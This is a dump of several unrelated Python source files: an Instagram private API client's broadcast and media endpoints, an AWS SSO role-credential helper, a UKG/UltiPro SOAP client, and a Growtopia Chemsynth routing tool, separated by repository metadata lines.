:param last_comment_ts:
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/get_comment/' % {'broadcast_id': broadcast_id}
res = self._call_api(endpoint, query={'last_comment_ts': last_comment_ts})
if self.auto_patch and res.get('comments'):
[ClientCompatPatch.comment(c) for c in res.get('comments', [])]
if res.get('pinned_comment'):
ClientCompatPatch.comment(res['pinned_comment'])
return res
def broadcast_heartbeat_and_viewercount(self, broadcast_id):
"""
Get a live broadcast's heartbeat and viewer count
:param broadcast_id: Broadcast id
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/heartbeat_and_get_viewer_count/' % {'broadcast_id': broadcast_id}
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid
}
return self._call_api(endpoint, params=params, unsigned=True)
def broadcast_comment(self, broadcast_id, comment_text):
"""
Post a comment to a live broadcast
:param broadcast_id: Broadcast id
:param comment_text: Comment text
:return:
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/comment/' % {'broadcast_id': broadcast_id}
params = {
'live_or_vod': '1',
'offset_to_video_start': '0',
'comment_text': comment_text,
'user_breadcrumb': gen_user_breadcrumb(len(comment_text)),
'idempotence_token': self.generate_uuid(),
}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch and res.get('comment'):
ClientCompatPatch.comment(res['comment'])
return res
def broadcast_info(self, broadcast_id):
"""
Get broadcast information.
Known broadcast_status values: 'active', 'interrupted', 'stopped', 'hard_stop'
:param broadcast_id: Broadcast Id
:return:
.. code-block:: javascript
{
"status": "ok",
"broadcast_status": "active",
"media_id": "12345678934374208_123456789",
"cover_frame_url": "https://scontent-hkg3-1.cdninstagram.com/something.jpg",
"broadcast_owner": {
"username": "abc",
"friendship_status": {
"incoming_request": false,
"followed_by": false,
"outgoing_request": false,
"following": false,
"blocking": false,
"is_private": false
},
"profile_pic_url": "http://scontent-hkg3-1.cdninstagram.com/somethingelse.jpg",
"profile_pic_id": "1234567850644676241_123456789",
"full_name": "ABC",
"pk": 123456789,
"is_verified": true,
"is_private": false
},
"dash_abr_playback_url": null,
"broadcast_message": "",
"published_time": 1485312576,
"dash_playback_url": "https://scontent-hkg3-1.cdninstagram.com/hvideo-ash1/v/dash-hd/spmething.mpd",
"rtmp_playback_url": "rtmp://svelivestream007.16.ash1.facebook.com:16000/live-hd/something",
"id": 178591123456789,
"viewer_count": 9000.0
}
"""
broadcast_id = str(broadcast_id)
endpoint = 'live/%(broadcast_id)s/info/' % {'broadcast_id': broadcast_id}
return self._call_api(endpoint)
def suggested_broadcasts(self, **kwargs):
"""
        Get suggested broadcasts
:param kwargs:
:return:
"""
return self._call_api('live/get_suggested_broadcasts/', query=kwargs)
```
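A hedged sketch of polling a live broadcast with the mixin above; the broadcast id is a placeholder and `api` is the composed client from the previous sketch:
```python
import time

broadcast_id = '17855915871991123'   # placeholder
last_ts = 0
for _ in range(3):
    api.broadcast_heartbeat_and_viewercount(broadcast_id)
    res = api.broadcast_comments(broadcast_id, last_comment_ts=last_ts)
    comments = res.get('comments', [])
    if comments:
        last_ts = comments[-1]['created_at']   # resume from the newest comment
    time.sleep(2)
```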
#### File: instagram_private_api/endpoints/media.py
```python
import json
import re
from ..utils import gen_user_breadcrumb
from ..compatpatch import ClientCompatPatch
class MediaEndpointsMixin(object):
def media_info(self, media_id):
"""
Get media info
:param media_id:
:return:
"""
endpoint = 'media/%(media_id)s/info/' % {'media_id': media_id}
res = self._call_api(endpoint)
if self.auto_patch:
[ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys)
for m in res.get('items', [])]
return res
def medias_info(self, media_ids):
"""
Get multiple media infos
:param media_ids: list of media ids
:return:
"""
if isinstance(media_ids, str):
media_ids = [media_ids]
params = {
'_uuid': self.uuid,
'_csrftoken': self.csrftoken,
'media_ids': ','.join(media_ids),
'ranked_content': 'true'
}
res = self._call_api('media/infos/', params=params, unsigned=True)
if self.auto_patch:
[ClientCompatPatch.media(m, drop_incompat_keys=self.drop_incompat_keys)
for m in res.get('items', [])]
return res
def media_permalink(self, media_id):
"""
Get media permalink
:param media_id:
:return:
"""
endpoint = 'media/%(media_id)s/permalink/' % {'media_id': media_id}
res = self._call_api(endpoint)
return res
def media_comments(self, media_id, **kwargs):
"""
Get media comments. Fixed at 20 comments returned per page.
:param media_id: Media id
:param kwargs:
**max_id**: For pagination
:return:
"""
endpoint = 'media/%(media_id)s/comments/' % {'media_id': media_id}
res = self._call_api(endpoint, query=kwargs)
if self.auto_patch:
[ClientCompatPatch.comment(c, drop_incompat_keys=self.drop_incompat_keys)
for c in res.get('comments', [])]
return res
def media_n_comments(self, media_id, n=150, reverse=False, **kwargs):
"""
Helper method to retrieve n number of comments for a media id
:param media_id: Media id
:param n: Minimum number of comments to fetch
:param reverse: Reverse list of comments (ordered by created_time)
:param kwargs:
:return:
"""
endpoint = 'media/%(media_id)s/comments/' % {'media_id': media_id}
comments = []
results = self._call_api(endpoint, query=kwargs)
comments.extend(results.get('comments', []))
while results.get('has_more_comments') and results.get('next_max_id') and len(comments) < n:
kwargs.update({'max_id': results.get('next_max_id')})
results = self._call_api(endpoint, query=kwargs)
comments.extend(results.get('comments', []))
if not results.get('next_max_id') or not results.get('comments'):
# bail out if no max_id or comments returned
break
if self.auto_patch:
[ClientCompatPatch.comment(c, drop_incompat_keys=self.drop_incompat_keys)
for c in comments]
return sorted(comments, key=lambda k: k['created_time'], reverse=reverse)
    def edit_media(self, media_id, caption, usertags=None):  # None avoids a mutable default argument
"""
Edit a media's caption
:param media_id: Media id
:param caption: Caption text
:param usertags: array of user_ids and positions in the format below:
.. code-block:: javascript
usertags = [
{"user_id":4292127751, "position":[0.625347,0.4384531]}
]
:return:
"""
endpoint = 'media/%(media_id)s/edit_media/' % {'media_id': media_id}
params = {'caption_text': caption}
params.update(self.authenticated_params)
if usertags:
utags = {'in': [{'user_id': u['user_id'], 'position': u['position']} for u in usertags]}
params['usertags'] = json.dumps(utags, separators=(',', ':'))
res = self._call_api(endpoint, params=params)
if self.auto_patch:
ClientCompatPatch.media(res.get('media'))
return res
def delete_media(self, media_id):
"""
Delete a media
:param media_id: Media id
:return:
.. code-block:: javascript
{"status": "ok", "did_delete": true}
"""
endpoint = 'media/%(media_id)s/delete/' % {'media_id': media_id}
params = {'media_id': media_id}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def post_comment(self, media_id, comment_text):
"""
Post a comment.
Comment text validation according to https://www.instagram.com/developer/endpoints/comments/#post_media_comments
:param media_id: Media id
:param comment_text: Comment text
:return:
.. code-block:: javascript
{
"comment": {
"status": "Active",
"media_id": 123456789,
"text": ":)",
"created_at": 1479453671.0,
"user": {
"username": "x",
"has_anonymous_profile_picture": false,
"profile_pic_url": "http://scontent-sit4-1.cdninstagram.com/abc.jpg",
"full_name": "x",
"pk": 123456789,
"is_verified": false,
"is_private": false
},
"content_type": "comment",
"created_at_utc": 1479482471,
"pk": 17865505612040669,
"type": 0
},
"status": "ok"
}
"""
if len(comment_text) > 300:
raise ValueError('The total length of the comment cannot exceed 300 characters.')
if re.search(r'[a-z]+', comment_text, re.IGNORECASE) and comment_text == comment_text.upper():
raise ValueError('The comment cannot consist of all capital letters.')
if len(re.findall(r'#[^#]+\b', comment_text, re.UNICODE | re.MULTILINE)) > 4:
raise ValueError('The comment cannot contain more than 4 hashtags.')
if len(re.findall(r'\bhttps?://\S+\.\S+', comment_text)) > 1:
raise ValueError('The comment cannot contain more than 1 URL.')
endpoint = 'media/%(media_id)s/comment/' % {'media_id': media_id}
params = {
'comment_text': comment_text,
'user_breadcrumb': gen_user_breadcrumb(len(comment_text)),
'idempotence_token': self.generate_uuid(),
'containermodule': 'comments_feed_timeline'
}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
if self.auto_patch:
ClientCompatPatch.comment(res['comment'], drop_incompat_keys=self.drop_incompat_keys)
return res
def delete_comment(self, media_id, comment_id):
"""
Delete a comment
:param media_id: Media id
:param comment_id: Comment id
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/comment/%(comment_id)s/delete/' % {
'media_id': media_id, 'comment_id': comment_id}
params = {}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def media_likers(self, media_id, **kwargs):
"""
Get users who have liked a post
:param media_id:
:return:
"""
endpoint = 'media/%(media_id)s/likers/' % {'media_id': media_id}
res = self._call_api(endpoint, query=kwargs)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def media_likers_chrono(self, media_id):
"""
Get users who have liked a post in chronological order
:param media_id:
:return:
"""
res = self._call_api('media/%(media_id)s/likers_chrono/' % {'media_id': media_id})
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def post_like(self, media_id):
"""
Like a post
:param media_id: Media id
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/like/' % {'media_id': media_id}
params = {'media_id': media_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def delete_like(self, media_id):
"""
Unlike a post
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/unlike/' % {'media_id': media_id}
params = {'media_id': media_id}
params.update(self.authenticated_params)
res = self._call_api(endpoint, params=params)
return res
def media_seen(self, reels):
"""
Mark multiple stories as seen
:param reels: A dict of media_ids and timings
.. code-block:: javascript
{
"1309763051087626108_124317": "1470355944_1470372029",
"1309764045355643149_124317": "1470356063_1470372039",
"1309818450243415912_124317": "1470362548_1470372060",
"1309764653429046112_124317": "1470356135_1470372049",
"1309209597843679372_124317": "1470289967_1470372013"
}
where
1309763051087626108_124317 = <media_id>,
1470355944_1470372029 is <media_created_time>_<view_time>
:return:
"""
params = {'nuxes': {}, 'reels': reels}
params.update(self.authenticated_params)
res = self._call_api('media/seen/', params=params)
return res
def comment_like(self, comment_id):
"""
Like a comment
:param comment_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(comment_id)s/comment_like/' % {'comment_id': comment_id}
params = self.authenticated_params
return self._call_api(endpoint, params=params)
def comment_likers(self, comment_id):
"""
Get users who have liked a comment
:param comment_id:
:return:
"""
endpoint = 'media/%(comment_id)s/comment_likers/' % {'comment_id': comment_id}
res = self._call_api(endpoint)
if self.auto_patch:
[ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys)
for u in res.get('users', [])]
return res
def comment_unlike(self, comment_id):
"""
Unlike a comment
:param comment_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(comment_id)s/comment_unlike/' % {'comment_id': comment_id}
params = self.authenticated_params
return self._call_api(endpoint, params=params)
def save_photo(self, media_id):
"""
Save a photo
:param media_id: Media id
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/save/' % {'media_id': media_id}
params = {'radio_type': 'WIFI'}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def unsave_photo(self, media_id):
"""
Unsave a photo
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/unsave/' % {'media_id': media_id}
params = {'radio_type': 'WIFI'}
params.update(self.authenticated_params)
return self._call_api(endpoint, params=params)
def disable_comments(self, media_id):
"""
Disable comments for a media
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/disable_comments/' % {'media_id': media_id}
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid,
}
res = self._call_api(endpoint, params=params, unsigned=True)
return res
def enable_comments(self, media_id):
"""
Enable comments for a media
:param media_id:
:return:
.. code-block:: javascript
{"status": "ok"}
"""
endpoint = 'media/%(media_id)s/enable_comments/' % {'media_id': media_id}
params = {
'_csrftoken': self.csrftoken,
'_uuid': self.uuid,
}
res = self._call_api(endpoint, params=params, unsigned=True)
return res
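# Hedged usage sketch (api is a composed client exposing this mixin; the media
# id is a placeholder):
#   comments = api.media_n_comments('1206573574980787543_1497851591', n=60)
#   api.post_comment('1206573574980787543_1497851591', 'Nice shot!')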
``` |
{
"source": "0xW1sKy/PowerShellTools",
"score": 2
} |
#### File: PowerShellTools/Reference/Get-AWSSSORoleCredential.py
```python
import boto3
import os
import subprocess
import sys
import getopt
import json
import datetime
import re
import webbrowser
import time
import configparser
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class awsRoleCredential:
def __init__(self, accountName, accountId, roleName, accessKey, secretKey, sessionToken, expiration):
self.accountName = accountName
self.accountId = accountId
self.roleName = roleName
self.accessKey = accessKey
self.secretKey = secretKey
self.sessionToken = sessionToken
self.expiration = expiration
#Add cross compatibility with the powershell version of this script.
#Allows conversion of dict object to be case insensitive
#Why aws responses in python have different capitalization than aws responses in powershell? dumb.
class CaseInsensitiveDict(dict):
class Key(str):
def __init__(self, key):
str.__init__(key)
def __hash__(self):
return hash(self.lower())
def __eq__(self, other):
return self.lower() == other.lower()
def __init__(self, data=None):
super(CaseInsensitiveDict, self).__init__()
if data is None:
data = {}
for key, val in data.items():
self[key] = val
def __contains__(self, key):
key = self.Key(key)
return super(CaseInsensitiveDict, self).__contains__(key)
def __setitem__(self, key, value):
key = self.Key(key)
super(CaseInsensitiveDict, self).__setitem__(key, value)
def __getitem__(self, key):
key = self.Key(key)
return super(CaseInsensitiveDict, self).__getitem__(key)
def urlCheck(string):
    # match a URL pattern at the start of the string (re.match anchors at the beginning)
url = re.match('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', string)
return url
def update_credentials_file(credential, profileLocation):
config = configparser.ConfigParser()
config.read(profileLocation)
profile_name = credential.accountName + "_" + credential.roleName
if profile_name not in config.sections():
config.add_section(profile_name)
assert profile_name in config.sections()
config[profile_name]["aws_access_key_id"] = str(credential.accessKey)
config[profile_name]["aws_secret_access_key"] = str(credential.secretKey)
config[profile_name]["aws_session_token"] = str(credential.sessionToken)
config.write(open(profileLocation, "w"), space_around_delimiters=False)
currentSession = boto3.session.Session()
defaultRegion = currentSession.region_name
newAccessToken = False
generateProfiles = False
startUrl = ''
accountId = ''
roleName = ''
passThru = ''
timeoutInSeconds = 60
clientName = 'default'
clientType = 'public'
path = os.path.join(os.environ['userprofile'],'.awsssohelper')
region = ''
accessToken = ''
try:
    opts, args = getopt.getopt(
        sys.argv[1:],
        # -a, -r and -s take arguments (trailing colon); the rest are flags
        "ha:r:s:pgo",
        [
            "help",
            "accountId=",
            "roleName=",
            "passThru",
            "generateProfiles",
            "outputToCredFile",
            "startUrl=",
            "clientName=",
            "clientType=",
            "path=",
            "newAccessToken",
            "region="
        ])
except getopt.GetoptError:
print('ERROR: Unable to parseOptions')
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', "--help"):
print('Usage: Get-AWSSSORoleCredential.py -s "https://mycompany.awsapps.com/start/" --generateProfiles')
sys.exit()
elif opt in ("-s", "--startUrl"):
startUrl = arg
elif opt in ("-a", "--accountId"):
accountId = arg
elif opt in ("-r", "--roleName"):
roleName = arg
elif opt in ("-p", "--passThru"):
passThru = True
elif opt in ("-g", "--generateProfiles"):
generateProfiles = True
elif opt in ("-o", "--outputToCredFile"):
outputToCredFile = True
elif opt == '--clientName':
clientName = arg
elif opt == '--clientType':
clientType = arg
elif opt == '--path':
path = arg
elif opt == '--newAccessToken':
newAccessToken = True
elif opt == '--region':
region = arg
if not urlCheck(startUrl):
print(bcolors.FAIL, 'ERROR: No startUrl provided. (--startUrl "https://mycompany.awsapps.com/start")', bcolors.ENDC)
sys.exit(2)
if not region:
if not defaultRegion:
print(bcolors.OKBLUE, "INFORMATION: No region specified, and no default region configured. Using recommended region us-east-1.", bcolors.ENDC)
region = 'us-east-1'
else:
if defaultRegion != 'us-east-1':
print(
bcolors.WARNING,
"WARNING: Current session default region is: ",
"\r\n",
defaultRegion,
"\r\n",
"For this script we recommend using us-east-1 as your defined region.",
"\r\n",
"At the time of writing this script, us-east-1 is the only functional region for AWS SSO.",
"\r\n",
bcolors.ENDC
)
if input('Would you like to set the region for this script to us-east-1? (y/n): ') != 'y':
region = defaultRegion
else:
region = 'us-east-1'
else:
region = defaultRegion
urlSubDomain = re.search("(https?://)?([^:^/]*)(:\\d*)?(.*)?", startUrl).group(2).split('.')[0]
cachePath = os.path.join(path,urlSubDomain)
ssooidc = boto3.client(
'sso-oidc',
region_name=region
)
if not os.path.isdir(path):
try:
os.mkdir(path)
except OSError:
print (bcolors.FAIL, "ERROR: Creation of the directory %s failed" % path, bcolors.ENDC)
sys.exit(2)
else:
print (bcolors.OKGREEN, "SUCCESS: Successfully created the directory %s " % path, bcolors.ENDC)
if os.path.isfile(cachePath):
with open(cachePath) as json_file:
accessToken = json.load(json_file)
accessToken = CaseInsensitiveDict(accessToken)
if not accessToken:
newAccessToken = True
else:
    # elapsed seconds since the token was issued, compared against expiresIn (also seconds)
    sessionAge = round((datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(int(re.split('\(|\)', accessToken['loggedAt'])[1][:10]))).total_seconds())
    if sessionAge >= accessToken['expiresIn']:
newAccessToken = True
if newAccessToken:
client = ssooidc.register_client(
clientName=clientName,
clientType=clientType
)
deviceAuth = ssooidc.start_device_authorization(
clientId=client['clientId'],
clientSecret=client['clientSecret'],
startUrl=startUrl
)
try:
webbrowser.open(deviceAuth['verificationUriComplete'], new=0, autoraise=True)
except OSError:
print(bcolors.OKBLUE, "\r\n","Visit the following URL to authorise this session:", "\r\n", deviceAuth['verificationUriComplete'], "\r\n", bcolors.ENDC)
accessToken = ''
print(bcolors.OKBLUE,'Waiting for SSO login via browser...',bcolors.ENDC)
ssoStart = datetime.datetime.utcnow()
while not accessToken and (datetime.datetime.utcnow() - ssoStart).total_seconds() < deviceAuth['expiresIn']:
try:
accessToken = ssooidc.create_token(
clientId=client['clientId'],
clientSecret=client['clientSecret'],
grantType="urn:ietf:params:oauth:grant-type:device_code",
deviceCode=deviceAuth['deviceCode']
)
                #add dumb formatting for datetime to match the .NET JavaScript deserialization format...
#helps with compatibility between python and powershell version of this script.
LoggedAt = '/Date(' + str(datetime.datetime.timestamp(datetime.datetime.strptime(accessToken['ResponseMetadata']['HTTPHeaders']['date'], '%a, %d %b %Y %H:%M:%S %Z').replace(tzinfo=datetime.timezone.utc)))[0:10] + ')/'
accessToken['LoggedAt']=LoggedAt
accessToken['startUrl']=startUrl
except:
time.sleep(deviceAuth['interval'])
if not accessToken:
    print(bcolors.FAIL, 'ERROR: No access token obtained.', bcolors.ENDC)
sys.exit(2)
else:
print(bcolors.OKGREEN, "\r\n", "Login Successful. Access Token Obtained", bcolors.ENDC)
with open(cachePath, 'w') as file:
file.write(json.dumps(accessToken))
sso = boto3.client(
'sso',
region_name=region
)
awsAccounts = sso.list_accounts(
maxResults = 123,
accessToken = accessToken['accessToken']
)
if not accountId :
    accountId = [o['accountId'] for o in awsAccounts['accountList']]
else :
    # a single -a value is a string; wrap it so the loop below doesn't iterate characters
    accountId = [accountId]
credentials = []
for aId in accountId :
if not roleName :
ssoRoles = sso.list_account_roles(
accessToken = accessToken['accessToken'],
accountId = aId
)['roleList']
else :
        # wrap the role name so the loop below can treat it like a roleList entry
        ssoRoles = [{'roleName': roleName, 'accountId': aId}]
for role in ssoRoles :
ssoRoleCredential = sso.get_role_credentials(
roleName = role['roleName'],
accountId = role['accountId'],
accessToken = accessToken['accessToken']
).get('roleCredentials')
credentials.append(awsRoleCredential([o['accountName'] for o in awsAccounts['accountList'] if o['accountId'] == aId][0],
aId,
role['roleName'],
ssoRoleCredential['accessKeyId'],
ssoRoleCredential['secretAccessKey'],
ssoRoleCredential['sessionToken'],
ssoRoleCredential['expiration'])
)
if generateProfiles :
credentialPath = os.path.join(os.environ['userprofile'],".aws","credentials")
for credential in credentials :
update_credentials_file(credential, credentialPath)
print(bcolors.OKGREEN, len(credentials), " AWS Credentials have been added to your credential store.", bcolors.ENDC)
sys.exit()
credentials
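# Example (hedged) invocations; the start URL, account id and role name are placeholders:
#   python Get-AWSSSORoleCredential.py -s "https://mycompany.awsapps.com/start" --generateProfiles
#   python Get-AWSSSORoleCredential.py -s "https://mycompany.awsapps.com/start" -a 123456789012 -r AdminRole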
``` |
{
"source": "0xW1sKy/ukg-python-sdk",
"score": 2
} |
#### File: src/ultipro/client.py
```python
from zeep import xsd
import csv
import os
import requests
import backoff  # Helps handle intermittent 405 errors from server
from ultipro.helpers import backoff_hdlr
from zeep import Client as ZeepClient
from zeep import Plugin
from zeep.transports import Transport
from lxml import etree
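# NOTE (hedged): applied to the class below, this decorator retries
# instantiation only; to retry individual API calls it would need to wrap the
# methods instead.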
@backoff.on_exception(
backoff.expo,
requests.exceptions.HTTPError,
max_tries=8,
on_backoff=backoff_hdlr,
)
class UltiProClient:
def __init__(
self,
username=os.environ.get("UKG_UserName"),
        password=os.environ.get("UKG_Password"),
client_access_key=os.environ.get("UKG_ClientAccessKey"),
user_access_key=os.environ.get("UKG_UserAccessKey"),
base_url="https://service4.ultipro.com/services/",
):
assert username is not None
assert password is not None
assert client_access_key is not None
assert user_access_key is not None
assert base_url is not None
self.username = username
self.password = password
self.client_access_key = client_access_key
self.user_access_key = user_access_key
self.base_url = base_url
def authenticate(self):
login_header = {
"UserName": self.username,
"Password": <PASSWORD>,
"ClientAccessKey": self.client_access_key,
"UserAccessKey": self.user_access_key,
}
endpoint = "LoginService"
# Log in and get session token
zeep_client = ZeepClient(f"{self.base_url}{endpoint}")
result = zeep_client.service.Authenticate(_soapheaders=login_header)
self.token = result["Token"]
# Create xsd ComplexType header - http://docs.python-zeep.org/en/master/headers.html
header = xsd.ComplexType(
[
xsd.Element(
"{http://www.ultimatesoftware.com/foundation/authentication/ultiprotoken}UltiProToken",
xsd.String(),
),
xsd.Element(
"{http://www.ultimatesoftware.com/foundation/authentication/clientaccesskey}ClientAccessKey",
xsd.String(),
),
]
)
# Add authenticated header to client object
self.session_header = header(
UltiProToken=self.token, ClientAccessKey=self.client_access_key
)
return True
def find_people(self, query):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
response = zeep_client.service.FindPeople(
_soapheaders=[self.session_header], query=query
)
return response["Results"]
def get_person_by_employee_number(self, employee_number):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
element = zeep_client.get_element("ns6:EmployeeNumberIdentifier")
obj = element(EmployeeNumber=employee_number)
response = zeep_client.service.GetPersonByEmployeeIdentifier(
_soapheaders=[self.session_header], employeeIdentifier=obj
)
return response["Results"]
def get_person_by_email_address(self, email_address):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
element = zeep_client.get_element("ns6:EmailAddressIdentifier")
obj = element(EmailAddress=email_address)
response = zeep_client.service.GetPersonByEmployeeIdentifier(
_soapheaders=[self.session_header], employeeIdentifier=obj
)
return response["Results"]
def update_person(self, person):
zeep_client = ZeepClient(f"{self.base_url}{'/EmployeePerson'}")
response = zeep_client.service.UpdatePerson(
_soapheaders=[self.session_header], entities=person
)
return response["Results"]
def log_on_with_token(self):
# print(inspect.getmembers(client))
credentials = {"Token": self.token, "ClientAccessKey": self.client_access_key}
# Log on to get ns5:DataContext object with auth
zeep_client = ZeepClient(f"{self.base_url}{'BiDataService'}")
element = zeep_client.get_element("ns5:LogOnWithTokenRequest")
obj = element(**credentials)
# print(inspect.getmembers(obj))
return zeep_client.service.LogOnWithToken(obj)
def get_report_list(self, context):
zeep_client = ZeepClient(f"{self.base_url}{'BiDataService'}")
return zeep_client.service.GetReportList(context)
def get_report_path_by_name(self, context, report_name):
report_list = self.get_report_list(context)
return list(
filter(lambda x: x["ReportName"] == report_name, report_list.Reports.Report)
)[0]["ReportPath"]
def get_report_parameters(self, report_path, context):
zeep_client = ZeepClient(f"{self.base_url}{'BiDataService'}")
return zeep_client.service.GetReportParameters(report_path, context)
def execute_report(self, context, report_path, delimiter=","):
session = requests.Session()
session.headers.update({"US-DELIMITER": delimiter})
transport = Transport(session=session)
payload = {"ReportPath": report_path}
zeep_client = ZeepClient(
f"{self.base_url}{'BiDataService'}", transport=transport
)
element = zeep_client.get_element("ns5:ReportRequest")
obj = element(**payload)
r = zeep_client.service.ExecuteReport(request=obj, context=context)
return r["ReportKey"]
def execute_and_retrieve_report(self, report_name, delimiter=","):
context = self.log_on_with_token()
report_path = self.get_report_path_by_name(context, report_name)
k = self.execute_report(context, report_path, delimiter=delimiter)
r = self.retrieve_report(k)
report = r["body"]["ReportStream"].decode("unicode-escape").split("\r\n")
csvreader = csv.reader(report)
headers = next(csvreader)
output = []
for row in csvreader:
if len(row) > 0:
output.append(
dict(
map(
lambda rowitem: (headers[rowitem], row[rowitem]),
range(len(row)),
)
)
)
return output
def retrieve_report(self, report_key):
zeep_client = ZeepClient(f"{self.base_url}{'BiStreamingService'}")
return zeep_client.service.RetrieveReport(
_soapheaders={"ReportKey": report_key}
)
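# Hedged usage sketch, assuming the UKG_* environment variables are set and a
# BI report with this name exists:
#   client = UltiProClient()
#   client.authenticate()
#   rows = client.execute_and_retrieve_report('Employee Roster')
#   print(rows[:1])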
``` |
{
"source": "0xwhoami/growtopia-chemsynth-router",
"score": 2
} |
#### File: 0xwhoami/growtopia-chemsynth-router/chemrouter.py
```python
import argparse
import sys
# import tool required
from route.route import route
from route.execute import execute
from chemsynth.chemsynth import Chemsynth, ChemsynthException
from chemsynth.chempoint import ChemsynthPoint, ChemsynthPointException
# =========
# Interface
# =========
def prepare(to_do_list):
    '''
    format to_do_list into do_list: collapse sequential repeats of the same
    (function, index) pair into a single entry that carries a repeat count
    '''
# prepare
f_idx, idx = to_do_list[0]
x = 1
do_list = []
# formatting to_do_list
for i in range(1, len(to_do_list)):
f_idx2, idx2 = to_do_list[i]
if f_idx == f_idx2 and idx == idx2:
x += 1
continue
do_list.append([f_idx, idx, x])
f_idx = f_idx2
idx = idx2
x = 1
do_list.append([f_idx, idx, x])
# return do_list
return do_list
def percentage(dom, tar):
'''
return percentage of equality
'''
value = ChemsynthPoint._ChemsynthPoint__point1(dom, tar)
length = len(dom)
value = int((value / length) * 100)
return value
def print_step(dom, tar, do_list, advance=False):
# list of tool name sorted based on index of function in execute.py
func_name = ["\"Centrifuge\"", "\"Stirrer\"", "\"Catalyst\"", "\"Replicator\""]
# prepare
chem = Chemsynth(dom)
tar = tar.upper()
step = 1
# table header
print("{step:^5} {tool:^12} {block:^12} {times:^12} {complete:^12}".format(step='STEP', tool='TOOL', block='BLOCK', times='TIMES', complete='COMPLETE'))
for f_idx, idx, x in do_list:
# get old chemsynth tank
temp = str(chem)
# executing as many as x
for y in range(x):
execute(chem, [[f_idx, idx]])
# print the step and the content
print("{step:<5} {tool:^12} {block:^12} {times:^12} {complete:^12}".format(step='#'+str(step), tool=func_name[f_idx], block=idx+1, times=x, complete=str(percentage(chem.dom, tar))+'%'))
# if advance == True, print with tank state
if advance == True:
print(temp, "->", chem)
step += 1
def get_parser():
'''
preparing for argument parser
'''
parser = argparse.ArgumentParser(prog='Chemsynth Router', description='Chemsynth Router by whoami and mrx', add_help=False)
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--doc', action='store_const', const=1, default=0, dest='doc', help='documentation about Chemsynth Router')
group.add_argument('-h', '--help', action='store_const', const=1, default=0, dest='help', help='show this help message')
group.add_argument('-q', '--quit', action='store_const', const=1, default=0, dest='quit', help='quit from program')
group.add_argument('-r', '--route', action="extend", nargs=2, help='route based on DOMAIN and TARGET, [COLOR] can be R, Y, G, B, P', metavar='[COLOR]', dest='route')
parser.add_argument('-a', '--advance', action='store_const', const=1, default=0, dest='advance', help='show step with realtime Chemsynth Tank color state, optionally with -r/--route')
group.add_argument('-v', '--version', action='store_const', const=1, default=0, dest='version', help='show program version')
return parser
def arg_check(Namespace):
'''
optional argument specified more than one in one line
'''
if Namespace.doc + Namespace.version + Namespace.quit + Namespace.help + Namespace.advance > 1:
raise ArgumentError
if Namespace.advance == 1 and not(any([Namespace.doc, Namespace.version, Namespace.quit, Namespace.help, Namespace.route])):
raise ArgumentError
def welcome():
print("Chemsynth Router [Version 2.0] by whoami and mrx\n"
"type -h or --help for more informations\n")
def doc():
print("Chemsynth Router v 2.0 is an open source program written in Python 3\n"
"created by whoami and mrx\n"
"source available at https://github.com/0xwhoami/Growtopia-Chemsynth-Router\n")
def help(parser):
parser.print_help()
def quit():
raise SystemExit2
def version():
print("Chemsynth Router 2.0")
# =====
# Error
# =====
class SystemExit2(Exception): pass
class ArgumentError(Exception): pass
# =====
# Start
# =====
welcome()
# get parser for argument
parser = get_parser()
while True:
try:
to_do_list = []
result = parser.parse_args(input(">>> ").split())
# checking argument
arg_check(result)
if result.doc:
doc()
elif result.help:
help(parser)
elif result.quit:
quit()
elif result.version:
version()
elif result.route:
# get domain and target
dom = result.route[0]
tar = result.route[1]
# routing
to_do_list = route(dom, tar)
# we can't route
if to_do_list == []:
print("sorry we can't route, it's the maximum we can do :(")
continue
do_list = prepare(to_do_list)
# print route step by step
print_step(dom, tar, do_list, result.advance)
except (ChemsynthException, ChemsynthPointException) as e:
print("error:", e)
except (ArgumentError, EOFError, KeyboardInterrupt):
help(parser)
except SystemExit2:
sys.exit(0)
except SystemExit:
pass
except:
# logging
log = open('log.txt', 'a')
print("error:", sys.exc_info()[:2], '\n',
"arg:", result,
